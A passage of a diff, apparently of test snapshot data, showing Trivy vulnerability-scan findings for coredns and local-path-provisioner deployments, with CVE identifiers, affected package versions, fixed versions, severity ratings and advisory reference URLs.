"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://security.gentoo.org/glsa/202209-02", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1n-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210917161153-d61c044b1678", - "packageName": "golang.org/x/sys", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", - ], - }, - "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "faccessat checks wrong group", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.tenable.com/security/tns-2022-09", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1i-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-1971", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "https://access.redhat.com/security/cve/CVE-2020-1971", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "https://linux.oracle.com/cve/CVE-2020-1971.html", + "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "https://security.gentoo.org/glsa/202012-13", + "https://security.netapp.com/advisory/ntap-20201218-0005/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://ubuntu.com/security/notices/USN-4662-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "https://www.debian.org/security/2020/dsa-4807", + "https://www.openssl.org/news/secadv/20201208.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "openssl: EDIPARTYNAME NULL pointer de-reference", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2020-1971", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "https://access.redhat.com/security/cve/CVE-2020-1971", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - 